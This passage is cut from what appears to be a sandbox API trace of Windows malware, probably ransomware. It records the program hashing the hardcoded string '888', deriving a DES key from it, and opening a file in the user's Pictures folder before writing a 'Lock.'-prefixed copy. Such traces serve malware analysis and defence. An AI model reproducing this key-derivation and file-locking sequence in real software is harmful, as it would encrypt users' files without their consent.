cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0211.795] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.795] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.795] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.795] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.795] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.795] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.795] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.795] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0211.795] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.795] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0211.795] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.795] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.795] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.795] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.795] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.795] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.795] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.795] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.795] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.795] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0211.796] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.796] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0211.796] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.796] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.796] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.796] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.797] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.797] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.797] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.797] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.797] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.797] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.797] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.797] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0211.797] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.797] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0211.797] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.797] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.797] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0211.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab1a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0211.797] CryptCreateHash (in: hProv=0xa7c990, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0211.797] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.797] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.797] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.797] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0211.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71bc8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0211.798] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0211.798] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0211.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71bc8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0211.798] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.798] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.798] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.798] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.798] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.798] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.798] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0211.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0211.798] CryptHashData (hHash=0x9e2238, pbData=0x2a71c28, dwDataLen=0x3, dwFlags=0x1) returned 1 [0211.798] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.798] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.798] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.798] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.798] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.799] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.799] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.799] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.799] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0211.799] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.799] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0211.799] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.799] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.799] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab2d8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0211.799] CryptDeriveKey (in: hProv=0xa7c990, Algid=0x6601, hBaseData=0x9e2238, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1bf8) returned 1 [0211.799] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.799] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.799] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.799] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.799] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.799] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.799] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.799] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0211.799] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.799] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0211.799] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0211.800] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0211.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7180, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0211.800] CryptDestroyHash (hHash=0x9e2238) returned 1 [0211.800] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.800] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.800] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.800] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.800] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.800] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/W9bUf5L8kEVKE-hdQ.png" (normalized: "c:\\users\\fd1hvy\\pictures\\w9buf5l8kevke-hdq.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f4 [0211.801] SetFilePointerEx (in: hFile=0x4f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.801] SetFilePointerEx (in: hFile=0x4f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0211.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ee0 [0211.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0211.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0211.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0211.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0211.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0211.801] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0211.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0211.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0211.801] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0211.801] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0211.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0211.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0211.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0211.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0211.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0211.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0211.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0211.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0211.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0211.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0211.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0211.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0211.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0211.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0211.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a744c0 [0211.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.802] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0211.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a744c0 | out: hHeap=0x2af0000) returned 1 [0211.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0211.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0211.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a930 [0211.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0211.803] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.W9bUf5L8kEVKE-hdQ.png" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.w9buf5l8kevke-hdq.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504 [0211.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7100 [0211.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0211.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0211.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0211.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0211.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0211.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0211.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0211.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0211.804] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0211.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0211.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0211.804] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0211.804] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0211.804] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0211.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0211.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0211.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0211.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0211.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0211.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0211.805] RtlAllocateHeap 